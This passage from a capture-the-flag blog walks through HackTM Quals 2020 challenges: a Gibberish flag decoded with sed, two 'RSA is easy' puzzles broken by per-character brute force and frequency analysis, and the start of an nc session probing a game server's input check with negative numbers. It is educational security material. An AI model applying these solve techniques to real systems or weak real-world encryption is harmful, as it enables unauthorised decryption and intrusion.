<span class="n">final</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">final</span><span class="p">)</span> <span class="o">%</span> <span class="mi">999999937</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Flag is : HackTM{"</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">final</span><span class="p">)</span> <span class="o">+</span> <span class="s2">"}"</span><span class="p">)</span>
</code></pre></div>
<p>Since Python is not really fast for doing it, I choose to use <a href="https://pypy.org/">pypy</a>. You can use it with your python script but pypy handle it with a different approach than regular Python interpretor.</p>
<div class="highlight"><pre><span></span><code>$ pypy3 prison_break.py
Flag is : HackTM<span class="o">{</span><span class="m">585778044</span><span class="o">}</span>
</code></pre></div>
<p>My script took <code>948,21s user 0,69s system 99% cpu 15:50,45 total</code>. I guess I can make it better and improve the input file too.</p>
<p>PS : I tried to compile my python script to C code with <a href="https://cython.org/">cython</a> but I can't get a working binary :(.</p>HackTM Quals20 - Romanian Gibberish2020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-romanian-gibberish.html<p><em>solves : 711</em></p>
<div class="highlight"><pre><span></span><code>Romanian Gibberish
25 Points
https://en.wikipedia.org/wiki/Gibberish_(language_game)
HapackTM{Wepelcopomepe_Topo_HAPACKTMCTF_2020!}
</code></pre></div>
<div class="highlight"><pre><span></span><code>Gibberish (sometimes Jibberish) is a language game that is played in the United States and Canada. Similar games are played in many other countries. The name Gibberish refers to the nonsensical sound of words spoken …</code></pre></div><p><em>solves : 711</em></p>
<div class="highlight"><pre><span></span><code>Romanian Gibberish
25 Points
https://en.wikipedia.org/wiki/Gibberish_(language_game)
HapackTM{Wepelcopomepe_Topo_HAPACKTMCTF_2020!}
</code></pre></div>
<div class="highlight"><pre><span></span><code>Gibberish (sometimes Jibberish) is a language game that is played in the United States and Canada. Similar games are played in many other countries. The name Gibberish refers to the nonsensical sound of words spoken according to the rules of this game.
</code></pre></div>
<p>So, we need to remove all nonsensical syllabus in the current flag. We know that all flags start with <code>HackTM{</code>. So, need to remove the <code>p</code> from the current one with the next character.</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"HapackTM{Wepelcopomepe_Topo_HAPACKTMCTF_2020!}"</span> <span class="p">|</span> sed <span class="s1">'s/[pP].//g'</span>
HackTM<span class="o">{</span>Welcome_To_HACKTMCTF_2020!<span class="o">}</span>
</code></pre></div>HackTM Quals20 - RSA is easy #12020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-rsa-is-easy-1.html<p><em>solves : 279</em></p>
<div class="highlight"><pre><span></span><code>RSA is easy #1
50 Points
Author: stackola
challenge_files.zip a6ba5325c1a34910db0f4e8cce82f5bd
</code></pre></div>
<p>We got two files in the zip:</p>
<div class="highlight"><pre><span></span><code>$ zipinfo challenge_files.zip
Archive: challenge_files.zip
Zip file size: <span class="m">5533</span> bytes, number of entries: <span class="m">3</span>
drwxr-xr-x <span class="m">3</span>.0 unx <span class="m">0</span> bx stor <span class="m">20</span>-Jan-15 <span class="m">17</span>:07 challenge_files/
-rw-r--r-- <span class="m">3</span>.0 …</code></pre></div><p><em>solves : 279</em></p>
<div class="highlight"><pre><span></span><code>RSA is easy #1
50 Points
Author: stackola
challenge_files.zip a6ba5325c1a34910db0f4e8cce82f5bd
</code></pre></div>
<p>We got two files in the zip:</p>
<div class="highlight"><pre><span></span><code>$ zipinfo challenge_files.zip
Archive: challenge_files.zip
Zip file size: <span class="m">5533</span> bytes, number of entries: <span class="m">3</span>
drwxr-xr-x <span class="m">3</span>.0 unx <span class="m">0</span> bx stor <span class="m">20</span>-Jan-15 <span class="m">17</span>:07 challenge_files/
-rw-r--r-- <span class="m">3</span>.0 unx <span class="m">11802</span> tx defN <span class="m">20</span>-Jan-15 <span class="m">16</span>:47 challenge_files/c
-rw-r--r-- <span class="m">3</span>.0 unx <span class="m">891</span> tx defN <span class="m">20</span>-Jan-15 <span class="m">17</span>:04 challenge_files/rsa.py
<span class="m">3</span> files, <span class="m">12693</span> bytes uncompressed, <span class="m">5017</span> bytes compressed: <span class="m">60</span>.5%
</code></pre></div>
<p>The python script show us how the other file <code>c</code> was created and the RSA implementation:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">random</span>
<span class="kn">from</span> <span class="nn">my_math</span> <span class="kn">import</span> <span class="n">next_prime</span>
<span class="kn">from</span> <span class="nn">flag</span> <span class="kn">import</span> <span class="n">flag</span>
<span class="k">def</span> <span class="nf">egcd</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
<span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">v</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span>
<span class="k">while</span> <span class="n">a</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">q</span><span class="p">,</span> <span class="n">r</span> <span class="o">=</span> <span class="n">b</span><span class="o">//</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span> <span class="o">%</span> <span class="n">a</span>
<span class="n">m</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">x</span><span class="o">-</span><span class="n">u</span><span class="o">*</span><span class="n">q</span><span class="p">,</span> <span class="n">y</span><span class="o">-</span><span class="n">v</span><span class="o">*</span><span class="n">q</span>
<span class="n">b</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">v</span> <span class="o">=</span> <span class="n">a</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">v</span><span class="p">,</span> <span class="n">m</span><span class="p">,</span> <span class="n">n</span>
<span class="n">gcd</span> <span class="o">=</span> <span class="n">b</span>
<span class="k">return</span> <span class="n">gcd</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span>
<span class="k">def</span> <span class="nf">gen_keys</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">q</span><span class="p">):</span>
<span class="n">e</span> <span class="o">=</span> <span class="mi">65537</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">q</span>
<span class="n">phi</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">gcd</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">b</span> <span class="o">=</span> <span class="n">egcd</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">phi</span><span class="p">)</span>
<span class="c1"># Keys:((pub), (priv))</span>
<span class="k">return</span> <span class="p">((</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">),</span> <span class="p">(</span><span class="n">d</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">enc</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
<span class="n">e</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">key</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="p">[</span><span class="nb">pow</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">),</span> <span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">p</span><span class="p">]</span>
<span class="k">return</span> <span class="n">cipher</span>
<span class="k">def</span> <span class="nf">dec</span><span class="p">(</span><span class="n">pk</span><span class="p">,</span> <span class="n">c</span><span class="p">):</span>
<span class="n">key</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">pk</span>
<span class="n">plain</span> <span class="o">=</span> <span class="p">[</span><span class="nb">chr</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">char</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">c</span><span class="p">]</span>
<span class="k">return</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">plain</span><span class="p">)</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">next_prime</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">SystemRandom</span><span class="p">()</span><span class="o">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="mi">512</span><span class="p">))</span>
<span class="n">q</span> <span class="o">=</span> <span class="n">next_prime</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">SystemRandom</span><span class="p">()</span><span class="o">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="mi">512</span><span class="p">))</span>
<span class="n">flag_key</span><span class="o">=</span><span class="n">gen_keys</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">q</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Public key:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag_key</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">flag_c</span><span class="o">=</span><span class="p">(</span><span class="n">enc</span><span class="p">(</span><span class="n">flag_key</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">flag</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Encrypted flag:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag_c</span><span class="p">)</span>
</code></pre></div>
<p>So, the <code>c</code> file contains the public as as the exponent and the <code>n</code> as <code>p</code> times <code>q</code> with the encoded flag:</p>
<div class="highlight"><pre><span></span><code>Public key:
(65537, 28150970547901913019901824364390497053600856369839321617996700606130553862041378369018779003752433356889118526332329074054728613209407037089320809898343953157935211086135010436283805891893636870991411236307901650696221491790470635225076251966300189483160148297407974155121570252648252906976186499329924342873)
Encrypted flag:
[24603931406187071861602497345394097692989773194039735745762181586628499407802825983901643034231448504738113184470035863824128031443012073830520233613935485192804104698999763287388765215634314977991988580048221541560353418280294402691661980705832590960497587810514295642811714680627768268704899874164681718449, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 15645290594995180815865397749136800126080704684884296404807344870555186823350216705796063922278419585484662234210001661578549560411864952462380096494781766394542247609648743673312823946783517115542404474786395934886667795692210287283039316418126796934535150832709500306153601987121172178183970841498331059732, 24345863558959407738249127568820138362115734211146549194534219311913032290216606859385934708675962835857804566049600710875035366973110422262131331932310524891713319358676673958738776644229757625523955354996402750265022578843637525183704187498194489645838490640529841182709661371499013082259193633000753627261, 9620679224297488175028367924764722982789333194446063577221477359704180638294602848741035585656113543497776415635770748468725814916994577398023154224563920936523717884116880223345204061598438291740007518025998041449406726084042681798053863495542392481059281588020105313791046017356493739244555377217866496734, 1681724029430984846089508679185107538104072555994133932050319175633667369916570440070548756805254789524599169177371471218251246349461689959989338169394649813424706418737543924129213419625988100326558802566046751879531469160120914735332858786199496335523515150741728027296830843112416558460932541777024522279, 20629854768856798537062426042570334097651328955665698429979954410631113160492201197690192324881508105172595216229624523572595589920695165876501026993810936392510720968159305964832449680889041278532807173859579419197780294984519222830572413180237776797800176462492384318120546495539728732366110782215071262307, 7440918084186181327822271261394344901791253526257166181264874776746516620936925799031445704193589071453959493392065321806281801023425299535553522582376879027448581379760896052013060957519595664095702210758316558762834545655992756483227787274192094065257224706388623944855362716578806372564148647945479173348, 5097867843777034076271397095201528351784693372027998615436445410912131141882225577577253530396333413579756394884096318434100382509189974240357351425474190558456256750742731090012822064840481143528081027106843123030275420215136304130321013605031261372665636366377162666476737296028608455229357416005773064242, 10420107412794383499391199999666100864853724770814620968725971207705900061273163202891569477729023724554388008575891113425781557296798472693974759813058067631655217722786373465395279381307973425004404348124524059844749313287030234750535347511172780349725636807760402334957881556461382950021814486095167001394, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 16657126895659048065404729920028465477385009450133540950695155983380795627778054526133891673615252510518969355629562948102050307259107355106086468465392660721567070464708776158039303608428552547481825035736610837329720474688421062759594907620576318249542577396722737724172954532394471909440668625218820801756, 11113777356910731413424023299582648618258376222028450254478672148119889617557563576704932635131420845868165014982665717620845578039880527701593963719893467068820107811384041511295664833904504511210342105242330522375476482706044695838957591685781703894244561607764476555630573446589408768780659378128082633769, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 1681724029430984846089508679185107538104072555994133932050319175633667369916570440070548756805254789524599169177371471218251246349461689959989338169394649813424706418737543924129213419625988100326558802566046751879531469160120914735332858786199496335523515150741728027296830843112416558460932541777024522279, 5237767970074646857079948735567615361735616179074197239639640947679550920349684166643572837235712904929824521258264241503059989875517915784117038966236672390569320206379357882906463342282254405974383459878863044723383164329146669331810709270455492110346838097216174137176255793792848357953314563364460847842, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 2141625583250052666579569568613448089970148215959031795439930595139028085767825695294403905882459409861220995951141855281841435481587946825079031782977651718402048988278639212978854590412709087674713750292922397103941195760574072700517109381299788645871729355745594573785064162048047595009933642068871994670, 278354276293884030290100330445865286604723740111170856624965259573282278044823323212960304154629174664076141280100412502135750130875356944835909175355370317285768658282746817782130476757714384697086179400629156643250500432197002583758692394681401772203578628635926749457621478296182304772136118691761841359, 6039667595601233082552071610487048398346324705021423176423484623705376133358539134558362499891954091431687578305623106726900655384011241742715735786166290331136153240702822544221903404870992713778423167867663948083662620087859096707381620051266745156545213726214080049764382107442159825610310695543673475542, 21353765873487781085375016306418205544750755310255410963646737671193146222650262290683259548572190880304009015662963424520575937651278866672082973874806201031606257157229306007587966460187818647603633973019548401357989358306250139692325474674826791149726161678649996852062656272851387461089863388359261125336, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 20576388598886140095325204584799302384454378372204683348252463729525849583734948105765087991438423260690623246579570440405616572326057536248148020737810766134083795050076636686776809469271643188562482921546497071402873405706504773345621716428511481598704631451463399778602486417840466985891815649711178813963, 17347447662661486040040289855519394974371562320877472776529836975445205017304164550202099250096382852783253959549113036367974281750823938616836362593312254792770954856762797438690474329666549947795964992533463700161635382925555835347885819042031312006167190561233042383984087765920275010577545908085026177611, 11788628214684738246695632901992250075758959059858474645166125685861157046466064692980236734739634298802473894878268029860203026238925142258303727438570051822763330338744774300757888262747314093511013562545738571326771345495509434761853742569509480619380000424215527153118231084573851377049921456961916278761, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 2141625583250052666579569568613448089970148215959031795439930595139028085767825695294403905882459409861220995951141855281841435481587946825079031782977651718402048988278639212978854590412709087674713750292922397103941195760574072700517109381299788645871729355745594573785064162048047595009933642068871994670, 2710029303357232932696197225263692040597986927359269224740812600224998707144266259851604978553286889767425982708691908438984279442981540971935737617354609856642312100797081348174935195638083002333058089328102430432526612805955273581245352312630845237670744276402867230550537275379675828467791243032108754996, 19981107233593350929447953514006501458466479260151660185153999799085657467921097940751860717309377498501638075002136637344148955811617399850718322497572421311807629329642551519284713638882025500074565475569618691516951449764680555447185364165687596161053684299589053909233984617244886185728811651967713024530, 3975884358027162862622932959187611984655247354547659825042810425039322096401899672988989768997134724085482147901304365437476311647149733392577446833370358728610677436154877051592307539990184750467273668379065865808900410057533079113476991204462719784464847498582643056503810805516315622314948257403761762299, 6039667595601233082552071610487048398346324705021423176423484623705376133358539134558362499891954091431687578305623106726900655384011241742715735786166290331136153240702822544221903404870992713778423167867663948083662620087859096707381620051266745156545213726214080049764382107442159825610310695543673475542, 14296542628093736444815382636071360035549021313467366701986569710120268508807886041986007828960248665683292143486565404978073122476968882030310174125355932205646388813061197657253533595700948593692407928813318978600474254105007396254987998953819782624738628334271910759242195864082910860797444993756044746481, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 7983594351048693624291138893287137601848867970873700373034058935656045095987011116108642350616654713531373295621458596238107660073931212524833777531450461876588350132328332972361857441613098452082271331281504722310376573085001395356078670960667878342134517577992585442881605030717788248137764480486762452442, 7983594351048693624291138893287137601848867970873700373034058935656045095987011116108642350616654713531373295621458596238107660073931212524833777531450461876588350132328332972361857441613098452082271331281504722310376573085001395356078670960667878342134517577992585442881605030717788248137764480486762452442, 23267174349531278768420819619439317179083929128083924515569762521057285892931325108327037262091624670335579302436476096123152288550738706103166820604983405317430467198343871458522070337902643863890959573514405066297449924638838605501211486861582957963752388608487593217237563529201436917108304692859773404548]
</code></pre></div>
<p>So, since we know all the number needed to perform the encryption operations, we can bruteforce each char in the flag with testing the encryption result with the target value:</p>
<div class="highlight"><pre><span></span><code><span class="n">decode</span> <span class="o">=</span> <span class="p">[</span><span class="mi">2460393140</span> <span class="p">[</span><span class="o">...</span><span class="p">]</span> <span class="mi">9773404548</span><span class="p">]</span>
<span class="n">e</span> <span class="o">=</span> <span class="mi">65537</span>
<span class="n">n</span> <span class="o">=</span> <span class="mi">28150970547901913019901824364390497053600856369839321617996700606130553862041378369018779003752433356889118526332329074054728613209407037089320809898343953157935211086135010436283805891893636870991411236307901650696221491790470635225076251966300189483160148297407974155121570252648252906976186499329924342873</span>
<span class="n">char_test</span> <span class="o">=</span> <span class="s2">"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!</span><span class="se">\"</span><span class="s2">#$%&</span><span class="se">\'</span><span class="s2">()*+,-./:;<=>?@[</span><span class="se">\\</span><span class="s2">]^_`{|}~"</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">decode</span><span class="p">:</span>
<span class="k">for</span> <span class="n">clear</span> <span class="ow">in</span> <span class="n">char_test</span><span class="p">:</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">clear</span><span class="p">),</span> <span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span>
<span class="k">if</span> <span class="n">cipher</span> <span class="o">==</span> <span class="n">char</span><span class="p">:</span>
<span class="n">flag</span> <span class="o">+=</span> <span class="n">clear</span>
<span class="k">pass</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
<p>And run the script and got the flag:</p>
<div class="highlight"><pre><span></span><code>$ python decode.py
HackTM<span class="o">{</span>why_ar3_MY_pR1va7es_pu8l1C_??<span class="o">}</span>
</code></pre></div>
<p>Since the operations are quite simple and the flag is not big, the operation was fast: <code>python decode.py 0,18s user 0,02s system 99% cpu 0,199 total</code>.</p>HackTM Quals20 - RSA is easy #22020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-rsa-is-easy-2.html<p><em>solves : 157</em></p>
<div class="highlight"><pre><span></span><code>RSA is easy #2
50 Points
Provide the flag in this format:
HackTM{words_you_found}
Example:
If you find "i am a flag"
submit:
HackTM{i_am_a_flag}
Author: stackola
challenge_files_2.zip bebe0b93b184fd375c3462488c9fde01
</code></pre></div>
<p>Same as <a href="/hacktm-quals20-rsa-is-easy-1.html">RSA is easy #1</a>, we have exactly the same python script but with a new <a href="https://blog.nlegall.fr/files/hacktm/rsa2/c">c …</a></p><p><em>solves : 157</em></p>
<div class="highlight"><pre><span></span><code>RSA is easy #2
50 Points
Provide the flag in this format:
HackTM{words_you_found}
Example:
If you find "i am a flag"
submit:
HackTM{i_am_a_flag}
Author: stackola
challenge_files_2.zip bebe0b93b184fd375c3462488c9fde01
</code></pre></div>
<p>Same as <a href="/hacktm-quals20-rsa-is-easy-1.html">RSA is easy #1</a>, we have exactly the same python script but with a new <a href="https://blog.nlegall.fr/files/hacktm/rsa2/c">c</a> file.</p>
<p>This time, we don't have the public key informations:</p>
<div class="highlight"><pre><span></span><code>Public key:
[DATA CORRUPTED]
</code></pre></div>
<p>We can't use the same bruteforce way to get back the clear text. But we got a lot of chipher text. We can replace each uniq occurence with a letter or number and make a frequence analysis.</p>
<p>Let's make a file with all the line and check how many different numbers we have:</p>
<div class="highlight"><pre><span></span><code>$ tail -n <span class="m">1</span> c <span class="p">|</span> sed -E <span class="s1">'s/\[(.*)\]/\1/g'</span> <span class="p">|</span> sed <span class="s1">'s/, /\n/g'</span> <span class="p">|</span> wc -l
<span class="m">1111</span>
tail -n <span class="m">1</span> c <span class="p">|</span> sed -E <span class="s1">'s/\[(.*)\]/\1/g'</span> <span class="p">|</span> sed <span class="s1">'s/, /\n/g'</span> <span class="p">|</span> sort -n <span class="p">|</span> uniq <span class="p">|</span>wc -l
<span class="m">31</span>
</code></pre></div>
<p>So. We got 1111 lines with 31 different values. We need to replace now each value. We can use some python code to do it:</p>
<div class="highlight"><pre><span></span><code><span class="n">mapping</span> <span class="o">=</span> <span class="p">{}</span>
<span class="n">cur</span> <span class="o">=</span> <span class="s2">"a"</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">cipher</span><span class="p">:</span>
<span class="k">if</span> <span class="n">x</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">mapping</span><span class="p">:</span>
<span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">=</span> <span class="n">cur</span>
<span class="n">cur</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">cur</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span>
<span class="n">mapped</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">freqs</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">cipher</span><span class="p">:</span>
<span class="n">mapped</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">])</span>
<span class="k">if</span> <span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">freqs</span><span class="p">:</span>
<span class="n">freqs</span><span class="p">[</span><span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]]</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">freqs</span><span class="p">[</span><span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]]</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="n">freqs_sorted</span> <span class="o">=</span> <span class="p">{</span><span class="n">k</span><span class="p">:</span> <span class="n">v</span> <span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">freqs</span><span class="o">.</span><span class="n">items</span><span class="p">(),</span> <span class="n">key</span><span class="o">=</span><span class="k">lambda</span> <span class="n">item</span><span class="p">:</span> <span class="n">item</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)}</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">mapped</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="nb">list</span><span class="p">(</span><span class="n">freqs_sorted</span><span class="o">.</span><span class="n">keys</span><span class="p">())[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">" "</span><span class="p">))</span>
</code></pre></div>
<p>We got finally some new text.</p>
<div class="highlight"><pre><span></span><code>abcd f agh fd ijkkclc fd mbc cgnko pqhr f sctfhcs abgm f uckfctcs agh g unfkkfgdm cdinovmfjd hibcwcx g hfwvkc vhcysjngdsjw dywucn hmncgw agh gsscs mj mbc vkgfdmczm hmncgw mj incgmc ifvbcnmczmx mbfh ajyks hccwfdlko mbagnm gdo {nc|ycdio gdgkohfh j{ mbc ifvbcnmczmr gds ajyks uc ydingi}gukc ctcd mj mbc wjhm nchjynic{yk ljtcndwcdm fdmckkflcdic glcdifchx f {ckm hj hwyl gujym wo gibfctcwcdmx ocgnh kgmcnr f sfhijtcncs mbfh hgwc hibcwc fd hctcngk fdmnjsyimjno inovmjlngvbo mczmh gds mymjnfgk vgvcnhx bja dficx jmbcn inovmjlngvbcnh bgs mbjylbm j{ mbc hgwc hibcwcx yd{jnmydgmckor mbc hibcwc agh vnchcdmcs gh g hfwvkc bjwcajn} ghhfldwcdm jd bja mj yhc ckcwcdmgno inovmgdgkomfi mcibdf|ych mj mnftfgkko ingi} fmx hj wyib {jn wo unfkkfgdm hibcwcx {njw mbfh bywukfdl czvcnfcdic f kcgndcs bja cgho fm fh mj {gkk fdmj g {gkhc hcdhc j{ hciynfmo abcd sctfhfdl gd cdinovmfjd gkljnfmbwx wjhm vcjvkc sjd~m ncgkfc bja {fcdsfhbko sf{{fiykm fm fh mj sctfhc gd cdinovmfjd gkljnfmbw mbgm igd afmbhmgds g vnjkjdlcs gds scmcnwfdcs gmmgi} uo g nchjynic{yk jvvjdcdmx bcnc fh mbc {kglx abcd fm ijwch mj inovmj jn ignvcm dctcn njkk ojyn jad
</code></pre></div>
<p>I used the website <a href="https://quipqiup.com/">quipqiup</a> to revert this text and get back the original one:</p>
<div class="highlight"><pre><span></span><code>when i was in college in the early fjsk i devised what i believed was a brilliant encryption schemez a simple pseudorandom number stream was added to the plaintext stream to create ciphertextz this would seemingly thwart any {re|uency analysis o{ the ciphertextk and would be uncrac}able even to the most resource{ul government intelligence agenciesz i {elt so smug about my achievementz years laterk i discovered this same scheme in several introductory cryptography texts and tutorial papersz how nicez other cryptographers had thought o{ the same schemez un{ortunatelyk the scheme was presented as a simple homewor} assignment on how to use elementary cryptanalytic techni|ues to trivially crac} itz so much {or my brilliant schemez {rom this humbling experience i learned how easy it is to {all into a {alse sense o{ security when devising an encryption algorithmz most people don~t realie how {iendishly di{{icult it is to devise an encryption algorithm that can withstand a prolonged and determined attac} by a resource{ul opponentz here is the {lagz when it comes to crypto or carpet never roll your own
</code></pre></div>
<p>Since we used some special chars to replace all the 31 one different numbers, we got some letter not replaced. But, the text is readable and we can get the flag: <code>HackTM{when_it_comes_to_crypto_or_carpet_never_roll_your_own}</code>.</p>HackTM Quals20 - The dragon sleeps at night2020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-the-dragon-sleeps-at-night.html<p><em>solves : 332</em></p>
<div class="highlight"><pre><span></span><code>The dragon sleeps at night
50 Points
I made this console based dragon RPG.
Go kill the beast!
nc 138.68.67.161 60004
Author: stackola
</code></pre></div>
<p>We have a role play and need to slay the dragon to discover the flag.</p>
<div class="highlight"><pre><span></span><code>$ nc 138.68.67.161 60004
Welcome …</code></pre></div><p><em>solves : 332</em></p>
<div class="highlight"><pre><span></span><code>The dragon sleeps at night
50 Points
I made this console based dragon RPG.
Go kill the beast!
nc 138.68.67.161 60004
Author: stackola
</code></pre></div>
<p>We have a role play and need to slay the dragon to discover the flag.</p>
<div class="highlight"><pre><span></span><code>$ nc 138.68.67.161 60004
Welcome to our little town!
We're glad you've decided to help us fight the dragon and bring back this town to it's old glory.
We have a shop where you can buy many different weapons for your fight!
There's also a mine for you to work at. The boss is a very trusting guy, don't try to scam him please.
-------------------------------
-------------------------------
Day: 0
Time: 00:00
Your balance: $0
-------------------------------
1: Go to store
2: Go to work
3: Go to dragons cave
4: Go home
5: Storage
</code></pre></div>
<p>Let's try to visit it to say hello:</p>
<div class="highlight"><pre><span></span><code>> 3
You can not enter this cave without a sword
</code></pre></div>
<p>Ok, then go to work:</p>
<div class="highlight"><pre><span></span><code>> 2
-------------------------------
Going to work...
Time passes...
Slowly...
-------------------------------
Boss wants to know how many hours you worked: > 99999
Only 3 characters allowed
-------------------------------
</code></pre></div>
<p>Can't use string binger than 3 chars. Let's try with a negative one:</p>
<div class="highlight"><pre><span></span><code>> <span class="mi">2</span>
-------------------------------
<span class="n">Going</span> <span class="nb">to</span> <span class="n">work</span>...
